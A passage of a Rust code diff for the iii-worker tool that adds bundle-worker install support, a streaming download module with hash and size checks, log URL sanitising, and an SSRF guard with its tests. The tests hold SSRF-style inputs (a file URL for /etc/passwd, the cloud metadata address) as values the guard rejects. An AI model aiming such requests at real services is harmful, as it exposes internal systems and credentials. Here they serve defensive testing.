+        assert!(cached_archive_path(&bad).is_none());
+    }
+
+    #[test]
+    fn cached_archive_path_accepts_valid_digest() {
+        let digest = "e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855";
+        let p = cached_archive_path(digest).expect("valid digest accepted");
+        assert!(p.to_string_lossy().ends_with(&format!("{digest}.tar.gz")));
+    }
+
+    // Note: `lookup_cached_archive` and `store_in_cache` exercise
+    // `dirs::home_dir()` for the cache root. Integration coverage of
+    // the round-trip is in T12's tests/bundle_worker_integration.rs
+    // (uses serial_test + HOME mutation, same as the other home-aware
+    // tests in this crate).
+
+    #[test]
+    fn copy_dir_tree_recurses_and_creates_dst() {
+        // Regression: the cross-device install path now copies into a
+        // sibling tmp dir BEFORE renaming into `final_dir`. The copy
+        // primitive must build the destination tree from scratch and
+        // recurse into nested directories.
+        let tmp = tempfile::tempdir().expect("tempdir");
+        let src = tmp.path().join("src");
+        std::fs::create_dir_all(src.join("nested/inner")).expect("mkdir");
+        std::fs::write(src.join("top.txt"), b"top").expect("write");
+        std::fs::write(src.join("nested/mid.txt"), b"mid").expect("write");
+        std::fs::write(src.join("nested/inner/leaf.txt"), b"leaf").expect("write");
+
+        let dst = tmp.path().join("dst");
+        copy_dir_tree(&src, &dst).expect("copy ok");
+
+        assert!(dst.join("top.txt").is_file());
+        assert!(dst.join("nested/mid.txt").is_file());
+        assert!(dst.join("nested/inner/leaf.txt").is_file());
+        assert_eq!(
+            std::fs::read(dst.join("nested/inner/leaf.txt")).unwrap(),
+            b"leaf"
+        );
+
+        // Source must remain — copy_dir_tree never deletes; atomic_install
+        // does that AFTER the sibling has been renamed into place.
+        assert!(src.join("top.txt").is_file());
+    }
+
+    #[test]
+    fn sibling_partial_dir_lives_next_to_final() {
+        let final_dir = std::path::PathBuf::from("/tmp/iii-bundles/myworker");
+        let sib = sibling_partial_dir(&final_dir);
+        assert_eq!(sib.parent(), final_dir.parent());
+        assert!(
+            sib.file_name()
+                .and_then(|s| s.to_str())
+                .map(|s| s.starts_with("myworker.partial."))
+                .unwrap_or(false),
+            "expected myworker.partial.* sibling, got {sib:?}"
+        );
+    }
+
+    #[test]
+    fn is_loopback_dev_archive_url_accepts_localhost_variants() {
+        assert!(super::is_loopback_dev_archive_url(
+            "http://localhost/foo.tar.gz"
+        ));
+        assert!(super::is_loopback_dev_archive_url(
+            "http://localhost:8000/foo.tar.gz"
+        ));
+        assert!(super::is_loopback_dev_archive_url(
+            "http://127.0.0.1:8000/foo.tar.gz"
+        ));
+        assert!(super::is_loopback_dev_archive_url(
+            "https://localhost/foo.tar.gz"
+        ));
+        assert!(super::is_loopback_dev_archive_url(
+            "http://[::1]/foo.tar.gz"
+        ));
+        assert!(super::is_loopback_dev_archive_url(
+            "http://LOCALHOST:8000/x"
+        ));
+    }
+
+    #[test]
+    fn is_loopback_dev_archive_url_rejects_public_hosts() {
+        // Anything that isn't the loopback trio stays on the strict
+        // SSRF guard path.
+        assert!(!super::is_loopback_dev_archive_url(
+            "https://cdn.example.com/foo.tar.gz"
+        ));
+        assert!(!super::is_loopback_dev_archive_url(
+            "https://10.0.0.1/foo.tar.gz"
+        ));
+        assert!(!super::is_loopback_dev_archive_url(
+            "https://169.254.169.254/foo"
+        ));
+        assert!(!super::is_loopback_dev_archive_url("not a url"));
+        assert!(!super::is_loopback_dev_archive_url("file:///etc/passwd"));
+    }
+
+    #[test]
+    fn filetime_touch_actually_updates_mtime() {
+        // Regression test for the previous no-op implementation that
+        // made the LRU cache effectively FIFO-by-write-time. After
+        // touch the file's mtime must reflect the supplied `now`.
+        let tmp = tempfile::tempdir().expect("tempdir");
+        let path = tmp.path().join("blob");
+        std::fs::write(&path, b"hello").expect("write");
+        let metadata = std::fs::metadata(&path).expect("metadata");
+
+        // Pick a target time that's clearly different from any
+        // filesystem-default value: 2030-01-01 00:00:00 UTC.
+        let target = std::time::UNIX_EPOCH + std::time::Duration::from_secs(1_893_456_000);
+        filetime_touch(&path, target, metadata).expect("touch ok");
+
+        let after = std::fs::metadata(&path)
+            .and_then(|m| m.modified())
+            .expect("modified after");
+        // Allow second-level rounding because some filesystems (e.g.
+        // FAT32, default ext4 without nsec) only store seconds; the
+        // assertion only needs to show we moved away from "now".
+        let after_secs = after
+            .duration_since(std::time::UNIX_EPOCH)
+            .map(|d| d.as_secs())
+            .unwrap_or(0);
+        assert_eq!(
+            after_secs, 1_893_456_000,
+            "expected mtime touched to target value, got {after_secs}"
+        );
+    }
+}

--- a/crates/iii-worker/src/cli/config_file.rs
+++ b/crates/iii-worker/src/cli/config_file.rs
@@ -9,7 +9,7 @@
 
 use std::path::Path;
 
-const CONFIG_FILE: &str = "config.yaml";
+pub(crate) const CONFIG_FILE: &str = "config.yaml";
 
 /// Resolve the engine's effective `iii-worker-manager` port from config.yaml.
 ///
@@ -71,6 +71,10 @@ pub enum ResolvedWorkerType {
     Local { worker_path: String },
     /// Binary worker — executable at ~/.iii/workers/{name}
     Binary { binary_path: std::path::PathBuf },
+    /// Bundle worker — extracted archive at ~/.iii/workers-bundle/{name}/
+    /// containing iii.worker.yaml. Dispatched through the local-worker
+    /// rails (libkrun boot) but with watcher disabled (immutable install).
+    Bundle { worker_path: std::path::PathBuf },
     /// Config-only / builtin worker — no image, path, or binary
     Config,
 }
@@ -633,22 +637,56 @@ fn resolve_worker_type_from_content(content: &str, name: &str) -> ResolvedWorker
 }
 
 /// Resolve the canonical worker type for a named worker.
-/// Reads config.yaml once and checks the filesystem for binary workers.
-/// Priority: local (worker_path) > OCI (image) > binary (~/.iii/workers/{name}) > config.
+/// Reads config.yaml once and checks the filesystem for binary/bundle workers.
+/// Priority: local (worker_path) > OCI (image) > bundle (~/.iii/workers-bundle/{name}/)
+/// > binary (~/.iii/workers/{name}) > config.
+///
+/// Bundle takes precedence over binary because the bundle install root is a
+/// distinct, newer install type (introduced for registry-published JS/Python
+/// workers). The two roots should never collide for the same name in
+/// practice; the `iii worker add` path returns W111 AlreadyExists if they do.
 pub fn resolve_worker_type(name: &str) -> ResolvedWorkerType {
     let path = std::path::Path::new(CONFIG_FILE);
     let content = match std::fs::read_to_string(path) {
         Ok(c) => c,
-        Err(_) => return check_binary_fallback(name),
+        Err(_) => return check_install_fallback(name),
     };
 
     match resolve_worker_type_from_content(&content, name) {
-        ResolvedWorkerType::Config => check_binary_fallback(name),
+        ResolvedWorkerType::Config => check_install_fallback(name),
         other => other,
     }
 }
 
-fn check_binary_fallback(name: &str) -> ResolvedWorkerType {
+/// Returns the directory where bundle workers are installed:
+/// `~/.iii/workers-bundle/`. Kept separate from `~/.iii/workers/` (used by
+/// binary workers) so the install-type resolver can disambiguate without
+/// content inspection.
+pub fn bundle_workers_dir() -> std::path::PathBuf {
+    dirs::home_dir()
+        .unwrap_or_default()
+        .join(".iii")
+        .join("workers-bundle")
+}
+
+/// Returns the install directory of a named bundle worker:
+/// `~/.iii/workers-bundle/{name}/`.
+pub fn bundle_worker_path(name: &str) -> std::path::PathBuf {
+    bundle_workers_dir().join(name)
+}
+
+/// Filesystem fallback precedence: bundle → binary → config-only.
+///
+/// A bundle install is detected by the presence of `iii.worker.yaml` inside
+/// the bundle directory (not just dir existence) so a stray empty directory
+/// or escaped staging dir doesn't trigger a false-positive Bundle resolve.
+fn check_install_fallback(name: &str) -> ResolvedWorkerType {
+    let bundle_dir = bundle_worker_path(name);
+    if bundle_dir.is_dir() && bundle_dir.join("iii.worker.yaml").is_file() {
+        return ResolvedWorkerType::Bundle {
+            worker_path: bundle_dir,
+        };
+    }
     let binary_path = dirs::home_dir()
         .unwrap_or_default()
         .join(".iii/workers")
@@ -658,6 +696,15 @@ fn check_binary_fallback(name: &str) -> ResolvedWorkerType {
     } else {
         ResolvedWorkerType::Config
     }
+}
+
+/// Backwards-compatible alias kept so external callers and tests that grew
+/// up alongside the binary-only resolver continue to compile. Internally
+/// delegates to `check_install_fallback`, which extends the precedence to
+/// cover bundle workers.
+#[allow(dead_code)]
+fn check_binary_fallback(name: &str) -> ResolvedWorkerType {
+    check_install_fallback(name)
 }
 
 /// Returns the `config:` block for a named worker as a flat `HashMap<String, String>`.

--- a/crates/iii-worker/src/cli/download.rs
+++ b/crates/iii-worker/src/cli/download.rs
@@ -1,0 +1,682 @@
+// Copyright Motia LLC and/or licensed to Motia LLC under one or more
+// contributor license agreements. Licensed under the Elastic License 2.0;
+// you may not use this file except in compliance with the Elastic License 2.0.
+// This software is patent protected. We welcome discussions - reach out at team@iii.dev
+// See LICENSE and PATENTS files for details.
+
+//! Shared HTTP download primitives used by both the binary-worker and
+//! bundle-worker install paths.
+//!
+//! Both callers pull artifacts from CDN-fronted HTTPS endpoints, verify
+//! a SHA-256 against the registry-provided expected digest, enforce a
+//! caller-supplied size cap, and assert basic response sanity (status
+//! code, optional content-type prefix, optional content-length pre-check
+//! before any bytes stream). The differences between callers are
+//! lifecycle, not protocol — binary workers buffer to memory before
+//! verifying, bundle workers stream straight to disk while hashing.
+//! This module exposes the streaming primitive that lets each lifecycle
+//! make its own buffering choice without duplicating the wire-level
+//! checks.
+
+use std::path::{Path, PathBuf};
+
+use sha2::{Digest, Sha256};
+
+/// Options controlling [`stream_response_to_path`].
+///
+/// `max_size` is enforced both pre-stream (against the `Content-Length`
+/// header when present) and during the stream itself (so a server that
+/// omits or lies about `Content-Length` cannot fool the cap).
+///
+/// `allowed_content_type_prefix`, when set, requires the response
+/// `Content-Type` to start with that string. Use `Some("application/")`
+/// for archive endpoints to reject mis-served HTML error pages cached
+/// by an upstream CDN.
+///
+/// `url_for_logs` is the URL string callers want to appear in log
+/// messages. Callers should pre-strip query parameters with
+/// `sanitize_url_for_logs` before passing pre-signed CDN tokens here.
+pub struct StreamOptions<'a> {
+    pub max_size: u64,
+    pub allowed_content_type_prefix: Option<&'a str>,
+    pub url_for_logs: &'a str,
+}
+
+/// Outcome of a successful streaming download.
+pub struct StreamOutcome {
+    /// Total bytes written to the destination path.
+    pub bytes_written: u64,
+    /// Lowercase hex SHA-256 of the bytes streamed. Callers compare
+    /// against the registry-supplied expected digest; this module does
+    /// not compare for them so the same primitive can serve flows that
+    /// don't have an expected digest at all (legacy binary downloads).
+    pub sha256_hex: String,
+}
+
+/// Streams an already-issued HTTP response body to `dest` while
+/// computing a SHA-256 and enforcing `opts.max_size`.
+///
+/// Caller is responsible for:
+///   * issuing the request (so it can pick the right HTTP client —
+///     redirect-allowed for the binary path, redirect-allowed-with-
+///     ad-hoc-loop for OCI-style auth flows, etc.),
+///   * checking the response status (we treat any successful status the
+///     caller hands us as valid),
+///   * comparing the returned SHA-256 against an expected digest,
+///   * cleaning up the destination file on failure (this function
+///     attempts a best-effort `remove_file` on error but a caller
+///     holding a tempdir guard will always own final cleanup).
+///
+/// Pre-stream guards:
+///   * Content-Type must start with `opts.allowed_content_type_prefix`
+///     when that is set.
+///   * Content-Length must not exceed `opts.max_size` when present.
+///
+/// In-stream guards:
+///   * Each chunk read is counted; the cumulative byte count must not
+///     exceed `opts.max_size`. Servers that lie about Content-Length
+///     are caught here.
+pub async fn stream_response_to_path(
+    response: reqwest::Response,
+    dest: &Path,
+    opts: StreamOptions<'_>,
+) -> Result<StreamOutcome, DownloadError> {
+    use futures::StreamExt as _;
+    use tokio::io::AsyncWriteExt as _;
+
+    if let Some(prefix) = opts.allowed_content_type_prefix {
+        if let Some(ct) = response
+            .headers()
+            .get(reqwest::header::CONTENT_TYPE)
+            .and_then(|v| v.to_str().ok())
+        {
+            if !ct.to_ascii_lowercase().starts_with(prefix) {
+                return Err(DownloadError::UnexpectedContentType {
+                    url: opts.url_for_logs.to_string(),
+                    content_type: ct.to_string(),
+                    expected_prefix: prefix.to_string(),
+                });
+            }
+        }
+    }
+
+    if let Some(len) = response.content_length()
+        && len > opts.max_size
+    {
+        return Err(DownloadError::TooLarge {
+            url: opts.url_for_logs.to_string(),
+            announced: Some(len),
+            limit: opts.max_size,
+        });
+    }
+
+    let mut file = tokio::fs::File::create(dest)
+        .await
+        .map_err(|source| DownloadError::Io {
+            path: dest.to_path_buf(),
+            source,
+        })?;
+
+    let mut hasher = Sha256::new();
+    let mut total: u64 = 0;
+    let mut stream = response.bytes_stream();
+    while let Some(chunk) = stream.next().await {
+        let bytes = chunk.map_err(|e| DownloadError::Network {
+            url: opts.url_for_logs.to_string(),
+            message: format!("read failed: {e}"),
+        })?;
+        total = total.saturating_add(bytes.len() as u64);
+        if total > opts.max_size {
+            // Don't leave a half-archive behind.
+            drop(file);
+            let _ = std::fs::remove_file(dest);
+            return Err(DownloadError::TooLarge {
+                url: opts.url_for_logs.to_string(),
+                announced: None,
+                limit: opts.max_size,
+            });
+        }
+        hasher.update(&bytes);
+        file.write_all(&bytes)
+            .await
+            .map_err(|source| DownloadError::Io {
+                path: dest.to_path_buf(),
+                source,
+            })?;
+    }
+    file.flush().await.map_err(|source| DownloadError::Io {
+        path: dest.to_path_buf(),
+        source,
+    })?;
+    drop(file);
+
+    Ok(StreamOutcome {
+        bytes_written: total,
+        sha256_hex: format!("{:x}", hasher.finalize()),
+    })
+}
+
+/// Strips both the query string AND any userinfo from a URL for safe
+/// logging.
+///
+/// Pre-signed CDN URLs carry their auth token in the query string
+/// (S3-style `X-Amz-Signature=...`). Some hostile or misconfigured
+/// registries hand back URLs with embedded credentials
+/// (`https://user:password@host/path`). Either form turns a leaky log
+/// into a download credential — strip both.
+///
+/// Falls back to the substring before the first `?` when the input
+/// isn't parseable as a URL, so it never panics on bad input.
+pub fn sanitize_url_for_logs(input: &str) -> String {
+    match reqwest::Url::parse(input) {
+        Ok(mut u) => {
+            u.set_query(None);
+            // set_username / set_password return Result<(), ()> for
+            // schemes that don't permit userinfo (data:, file:, ...).
+            // Ignore failures — they mean userinfo wasn't there to
+            // strip.
+            let _ = u.set_username("");
+            let _ = u.set_password(None);
+            u.to_string()
+        }
+        Err(_) => input.split('?').next().unwrap_or(input).to_string(),
+    }
+}
+
+/// Validates an artifact URL against the basic SSRF guard policy
+/// before any network I/O is issued:
+///
+/// 1. Scheme must be exactly `https`. Plain HTTP, `file:`, `ftp:`,
+///    `gopher:`, and anything else are rejected. A pre-signed CDN URL
+///    cannot legitimately use a non-HTTPS scheme.
+/// 2. Host must be present and must not be a reserved hostname
+///    (`localhost`, `localhost.localdomain`, `ip6-localhost`,
+///    `ip6-loopback`).
+/// 3. When the host is a literal IP, it must be a globally-routable
+///    address. Loopback (`127.0.0.0/8`, `::1`), link-local
+///    (`169.254.0.0/16` — covers AWS/GCE IMDS — and `fe80::/10`),
+///    unspecified (`0.0.0.0`, `::`), multicast, broadcast, documentation
+///    (`192.0.2.0/24`, `198.51.100.0/24`, `203.0.113.0/24`,
+///    `2001:db8::/32`), and RFC-1918 private (`10/8`, `172.16/12`,
+///    `192.168/16`) ranges are rejected.
+///
+/// Hostname-based hosts are NOT resolved here: that would add a DNS
+/// round-trip to every install and the caller already trusts the
+/// registry's TLS chain. A hostile registry that publishes
+/// `https://internal.corp/...` still gets a TCP connect attempt — but
+/// the cap is to refuse the obviously-internal IP literals and reserved
+/// names a non-malicious registry would never use.
+pub fn validate_archive_url_for_ssrf(url_str: &str) -> Result<(), SsrfError> {
+    let url = reqwest::Url::parse(url_str).map_err(|e| SsrfError::Malformed {
+        url: url_str.to_string(),
+        reason: format!("{e}"),
+    })?;
+
+    if url.scheme() != "https" {
+        return Err(SsrfError::DisallowedScheme {
+            url: sanitize_url_for_logs(url_str),
+            scheme: url.scheme().to_string(),
+        });
+    }
+
+    let host = url.host_str().ok_or_else(|| SsrfError::Malformed {
+        url: sanitize_url_for_logs(url_str),
+        reason: "URL has no host component".to_string(),
+    })?;
+
+    // Reserved hostnames a CDN URL would never legitimately use.
+    let host_lower = host.to_ascii_lowercase();
+    if matches!(
+        host_lower.as_str(),
+        "localhost" | "localhost.localdomain" | "ip6-localhost" | "ip6-loopback"
+    ) {
+        return Err(SsrfError::DisallowedHost {
+            url: sanitize_url_for_logs(url_str),
+            host: host.to_string(),
+            reason: "reserved hostname".to_string(),
+        });
+    }
+
+    // If the host parses as a literal IP (IPv4 dotted-quad or IPv6
+    // bracketed/bare), enforce the non-routable check. Hostname-only
+    // hosts (e.g. `cdn.example.com`) skip this check — DNS resolution
+    // would be a separate, slower defense layer outside v1 scope.
+    if let Some(ip) = parse_host_as_ip(host)
+        && let Some(reason) = ip_is_non_routable(ip)
+    {
+        return Err(SsrfError::DisallowedHost {
+            url: sanitize_url_for_logs(url_str),
+            host: ip.to_string(),
+            reason: reason.to_string(),
+        });
+    }
+
+    Ok(())
+}
+
+/// Returns `Some(reason)` if the literal IP is in a non-routable range
+/// (loopback, link-local, private, etc.) and must be refused for
+/// artifact downloads. `None` means the IP is globally routable as far
+/// as we can tell from a literal inspection.
+///
+/// Uses the std::net unstable helpers via stable equivalents so we can
+/// compile on stable. The conditions mirror RFC 6890 / 3927 / 1918 /
+/// 4291 / 5737 / 3849.
+fn ip_is_non_routable(ip: std::net::IpAddr) -> Option<&'static str> {
+    use std::net::{IpAddr, Ipv4Addr, Ipv6Addr};
+    match ip {
+        IpAddr::V4(v4) => {
+            if v4.is_loopback() {
+                return Some("loopback IPv4 address");
+            }
+            if v4.is_link_local() {
+                return Some("link-local IPv4 address (e.g. AWS/GCE IMDS 169.254.169.254)");
+            }
+            if v4.is_unspecified() {
+                return Some("unspecified IPv4 address (0.0.0.0)");
+            }
+            if v4.is_broadcast() {
+                return Some("broadcast IPv4 address");
+            }
+            if v4.is_multicast() {
+                return Some("multicast IPv4 address");
+            }
+            if v4.is_private() {
+                return Some("RFC-1918 private IPv4 address");
+            }
+            // RFC-6598 carrier-grade NAT: 100.64.0.0/10.
+            let octets = v4.octets();
+            if octets[0] == 100 && (64..=127).contains(&octets[1]) {
+                return Some("RFC-6598 carrier-grade NAT IPv4 address");
+            }
+            // RFC-5737 documentation ranges.
+            if v4.octets()[..3] == [192, 0, 2]
+                || v4.octets()[..3] == [198, 51, 100]
+                || v4.octets()[..3] == [203, 0, 113]
+            {
+                return Some("RFC-5737 documentation IPv4 address");
+            }
+            // 0.0.0.0/8 — current network.
+            if v4.octets()[0] == 0 {
+                return Some("0.0.0.0/8 reserved IPv4 range");
+            }
+            // 127/8 already handled by is_loopback.
+            // 255.255.255.255 already by is_broadcast.
+            None
+        }
+        IpAddr::V6(v6) => {
+            if v6.is_loopback() {
+                return Some("loopback IPv6 address (::1)");
+            }
+            if v6.is_unspecified() {
+                return Some("unspecified IPv6 address (::)");
+            }
+            if v6.is_multicast() {
+                return Some("multicast IPv6 address");
+            }
+            let segments = v6.segments();
+            // fe80::/10 — link-local.
+            if segments[0] & 0xffc0 == 0xfe80 {
+                return Some("link-local IPv6 address (fe80::/10)");
+            }
+            // fc00::/7 — unique local (RFC 4193).
+            if segments[0] & 0xfe00 == 0xfc00 {
+                return Some("unique-local IPv6 address (fc00::/7)");
+            }
+            // 2001:db8::/32 — documentation.
+            if segments[0] == 0x2001 && segments[1] == 0x0db8 {
+                return Some("RFC-3849 documentation IPv6 address");
+            }
+            // IPv4-mapped IPv6 (::ffff:0:0/96): recurse on the embedded v4.
+            if let Some(mapped) = v6.to_ipv4_mapped() {
+                let _ = Ipv4Addr::from(mapped); // type-check
+                return ip_is_non_routable(IpAddr::V4(mapped));
+            }
+            // IPv4-compatible (::a.b.c.d/96, deprecated) and IPv4-in-IPv6.
+            if segments[0..5] == [0; 5]
+                && segments[5] == 0
+                && let Some(v4) = ipv4_in_ipv6_compat(&v6)
+            {
+                return ip_is_non_routable(IpAddr::V4(v4));
+            }
+            // IPv4-translated (::ffff:0:0:0/96 NAT64 SIIT) handled by to_ipv4_mapped.
+            // Catch-all: ::/128 already by unspecified; 100::/64 discard prefix.
+            if segments[0] == 0x0100 && segments[1..4] == [0, 0, 0] {
+                return Some("RFC-6666 IPv6 discard prefix (100::/64)");
+            }
+            // 2002::/16 6to4 — allow (publicly routable).
+            let _ = Ipv6Addr::from(segments);
+            None
+        }
+    }
+}
+
+/// Parses a URL host string as an `IpAddr`. Handles both plain IPv4
+/// (`"127.0.0.1"`) and bracketed IPv6 (`"[::1]"`) — the latter is how
+/// `reqwest::Url::host_str()` returns IPv6 hosts to keep the form
+/// roundtrip-safe.
+fn parse_host_as_ip(host: &str) -> Option<std::net::IpAddr> {
+    use std::net::IpAddr;
+    let trimmed = if let Some(s) = host.strip_prefix('[')
+        && let Some(s) = s.strip_suffix(']')
+    {
+        s
+    } else {
+        host
+    };
+    trimmed.parse::<IpAddr>().ok()
+}
+
+fn ipv4_in_ipv6_compat(v6: &std::net::Ipv6Addr) -> Option<std::net::Ipv4Addr> {
+    let s = v6.segments();
+    // ::a.b.c.d
+    if s[0..6] == [0, 0, 0, 0, 0, 0] && (s[6] != 0 || s[7] != 0) {
+        let a = (s[6] >> 8) as u8;
+        let b = (s[6] & 0xff) as u8;
+        let c = (s[7] >> 8) as u8;
+        let d = (s[7] & 0xff) as u8;
+        Some(std::net::Ipv4Addr::new(a, b, c, d))
+    } else {
+        None
+    }
+}
+
+/// Errors raised by `validate_archive_url_for_ssrf` before any wire I/O.
+#[derive(Debug)]
+pub enum SsrfError {
+    Malformed {
+        url: String,
+        reason: String,
+    },
+    DisallowedScheme {
+        url: String,
+        scheme: String,
+    },
+    DisallowedHost {
+        url: String,
+        host: String,
+        reason: String,
+    },
+}
+
+impl std::fmt::Display for SsrfError {
+    fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
+        match self {
+            Self::Malformed { url, reason } => {
+                write!(f, "malformed archive URL {url:?}: {reason}")
+            }
+            Self::DisallowedScheme { url, scheme } => write!(
+                f,
+                "archive URL {url:?} uses disallowed scheme {scheme:?}; only https is permitted"
+            ),
+            Self::DisallowedHost { url, host, reason } => write!(
+                f,
+                "archive URL {url:?} refers to host {host:?} ({reason}); refusing to fetch"
+            ),
+        }
+    }
+}
+
+impl std::error::Error for SsrfError {}
+
+/// Wire-level download errors. Per-feature install paths translate
+/// these into their preferred `WorkerOpError` shapes (binary keeps
+/// stringly-typed for backwards compat with existing tests, bundle maps
+/// to `WorkerOpError::Download`).
+#[derive(Debug)]
+pub enum DownloadError {
+    Network {
+        url: String,
+        message: String,
+    },
+    UnexpectedContentType {
+        url: String,
+        content_type: String,
+        expected_prefix: String,
+    },
+    TooLarge {
+        url: String,
+        announced: Option<u64>,
+        limit: u64,
+    },
+    Io {
+        path: PathBuf,
+        source: std::io::Error,
+    },
+}
+
+impl std::fmt::Display for DownloadError {
+    fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
+        match self {
+            Self::Network { url, message } => {
+                write!(f, "network error for {url:?}: {message}")
+            }
+            Self::UnexpectedContentType {
+                url,
+                content_type,
+                expected_prefix,
+            } => write!(
+                f,
+                "{url:?} returned content-type {content_type:?}; expected one starting with {expected_prefix:?}"
+            ),
+            Self::TooLarge {
+                url,
+                announced,
+                limit,
+            } => match announced {
+                Some(n) => write!(
+                    f,
+                    "{url:?} content-length {:.1} MiB exceeds limit {:.1} MiB",
+                    *n as f64 / 1_048_576.0,
+                    *limit as f64 / 1_048_576.0,
+                ),
+                None => write!(
+                    f,
+                    "{url:?} body exceeded {:.1} MiB during stream",
+                    *limit as f64 / 1_048_576.0,
+                ),
+            },
+            Self::Io { path, source } => {
+                write!(f, "I/O error at {}: {source}", path.display())
+            }
+        }
+    }
+}
+
+impl std::error::Error for DownloadError {
+    fn source(&self) -> Option<&(dyn std::error::Error + 'static)> {
+        match self {
+            Self::Io { source, .. } => Some(source),
+            _ => None,
+        }
+    }
+}
+
+#[cfg(test)]
+mod tests {
+    use super::*;
+
+    #[test]
+    fn sanitize_url_strips_query() {
+        assert_eq!(
+            sanitize_url_for_logs("https://cdn.example.com/foo.tar.gz?token=secret"),
+            "https://cdn.example.com/foo.tar.gz"
+        );
+    }
+
+    #[test]
+    fn sanitize_url_falls_back_on_bad_input() {
+        assert_eq!(sanitize_url_for_logs("not-a-url?token=secret"), "not-a-url");
+    }
+
+    #[test]
+    fn sanitize_url_preserves_path_and_port() {
+        assert_eq!(
+            sanitize_url_for_logs("https://cdn.example.com:8443/v1/foo/bar.tar.gz?sig=x"),
+            "https://cdn.example.com:8443/v1/foo/bar.tar.gz"
+        );
+    }
+
+    #[test]
+    fn download_error_display_includes_url() {
+        let e = DownloadError::Network {
+            url: "https://x".into(),
+            message: "boom".into(),
+        };
+        assert!(format!("{e}").contains("https://x"));
+        assert!(format!("{e}").contains("boom"));
+    }
+
+    #[test]
+    fn download_error_too_large_announced_renders_megabytes() {
+        let e = DownloadError::TooLarge {
+            url: "https://x".into(),
+            announced: Some(128 * 1024 * 1024),
+            limit: 64 * 1024 * 1024,
+        };
+        let s = format!("{e}");
+        assert!(s.contains("128"), "expected announced MiB in: {s}");
+        assert!(s.contains("64"), "expected limit MiB in: {s}");
+    }
+
+    // -------------------- SSRF guard --------------------
+
+    #[test]
+    fn ssrf_accepts_public_https() {
+        validate_archive_url_for_ssrf("https://cdn.example.com/v1/foo.tar.gz?sig=x")
+            .expect("public https accepted");
+        validate_archive_url_for_ssrf("https://8.8.8.8/foo.tar.gz").expect("public IPv4 accepted");
+        validate_archive_url_for_ssrf("https://[2606:4700:4700::1111]/foo.tar.gz")
+            .expect("public IPv6 accepted");
+    }
+
+    #[test]
+    fn ssrf_rejects_non_https_scheme() {
+        let err = validate_archive_url_for_ssrf("http://cdn.example.com/foo.tar.gz")
+            .expect_err("plain http rejected");
+        assert!(matches!(err, SsrfError::DisallowedScheme { .. }));
+        let err =
+            validate_archive_url_for_ssrf("file:///etc/passwd").expect_err("file scheme rejected");
+        assert!(matches!(err, SsrfError::DisallowedScheme { .. }));
+        let err = validate_archive_url_for_ssrf("ftp://ftp.example.com/foo.tar.gz")
+            .expect_err("ftp scheme rejected");
+        assert!(matches!(err, SsrfError::DisallowedScheme { .. }));
+    }
+
+    #[test]
+    fn ssrf_rejects_reserved_hostnames() {
+        let err = validate_archive_url_for_ssrf("https://localhost/foo.tar.gz")
+            .expect_err("localhost rejected");
+        assert!(matches!(err, SsrfError::DisallowedHost { .. }));
+        let err = validate_archive_url_for_ssrf("https://LocalHost.LocalDomain/foo.tar.gz")
+            .expect_err("localhost.localdomain rejected case-insensitive");
+        assert!(matches!(err, SsrfError::DisallowedHost { .. }));
+    }
+
+    #[test]
+    fn ssrf_rejects_loopback_ipv4() {
+        let err = validate_archive_url_for_ssrf("https://127.0.0.1/foo.tar.gz")
+            .expect_err("loopback rejected");
+        assert!(matches!(err, SsrfError::DisallowedHost { .. }));
+        let err = validate_archive_url_for_ssrf("https://127.42.42.42/foo.tar.gz")
+            .expect_err("127/8 rejected");
+        assert!(matches!(err, SsrfError::DisallowedHost { .. }));
+    }
+
+    #[test]
+    fn ssrf_rejects_link_local_ipv4_imds() {
+        let err = validate_archive_url_for_ssrf("https://169.254.169.254/latest/meta-data/")
+            .expect_err("IMDS rejected");
+        assert!(matches!(err, SsrfError::DisallowedHost { .. }));
+    }
+
+    #[test]
+    fn ssrf_rejects_rfc1918_private_ipv4() {
+        for url in [
+            "https://10.0.0.1/foo.tar.gz",
+            "https://172.16.0.1/foo.tar.gz",
+            "https://192.168.1.1/foo.tar.gz",
+        ] {
+            let err = validate_archive_url_for_ssrf(url)
+                .expect_err(&format!("rfc1918 not rejected for {url}"));
+            assert!(matches!(err, SsrfError::DisallowedHost { .. }));
+        }
+    }
+
+    #[test]
+    fn ssrf_rejects_rfc6598_cgnat_ipv4() {
+        let err = validate_archive_url_for_ssrf("https://100.64.0.1/foo.tar.gz")
+            .expect_err("CGNAT rejected");
+        assert!(matches!(err, SsrfError::DisallowedHost { .. }));
+    }
+
+    #[test]
+    fn ssrf_rejects_unspecified_and_broadcast() {
+        let err = validate_archive_url_for_ssrf("https://0.0.0.0/foo.tar.gz")
+            .expect_err("0.0.0.0 rejected");
+        assert!(matches!(err, SsrfError::DisallowedHost { .. }));
+        let err = validate_archive_url_for_ssrf("https://255.255.255.255/foo.tar.gz")
+            .expect_err("broadcast rejected");
+        assert!(matches!(err, SsrfError::DisallowedHost { .. }));
+    }
+
+    #[test]
+    fn ssrf_rejects_loopback_ipv6() {
+        let err = validate_archive_url_for_ssrf("https://[::1]/foo.tar.gz")
+            .expect_err("ipv6 loopback rejected");
+        assert!(matches!(err, SsrfError::DisallowedHost { .. }));
+    }
+
+    #[test]
+    fn ssrf_rejects_link_local_ipv6() {
+        let err = validate_archive_url_for_ssrf("https://[fe80::1]/foo.tar.gz")
+            .expect_err("fe80 rejected");
+        assert!(matches!(err, SsrfError::DisallowedHost { .. }));
+    }
+
+    #[test]
+    fn ssrf_rejects_unique_local_ipv6() {
+        let err = validate_archive_url_for_ssrf("https://[fc00::1]/foo.tar.gz")
+            .expect_err("fc00 rejected");
+        assert!(matches!(err, SsrfError::DisallowedHost { .. }));
+        let err = validate_archive_url_for_ssrf("https://[fd00::1]/foo.tar.gz")
+            .expect_err("fd00 rejected");
+        assert!(matches!(err, SsrfError::DisallowedHost { .. }));
+    }
+
+    #[test]
+    fn ssrf_rejects_ipv4_mapped_loopback() {
+        // ::ffff:127.0.0.1 — same target as 127.0.0.1, must also be refused.
+        let err = validate_archive_url_for_ssrf("https://[::ffff:127.0.0.1]/foo.tar.gz")
+            .expect_err("ipv4-mapped loopback rejected");
+        assert!(matches!(err, SsrfError::DisallowedHost { .. }));
+    }
+
+    #[test]
+    fn ssrf_rejects_documentation_ranges() {
+        let err = validate_archive_url_for_ssrf("https://192.0.2.1/foo.tar.gz")
+            .expect_err("TEST-NET-1 rejected");
+        assert!(matches!(err, SsrfError::DisallowedHost { .. }));
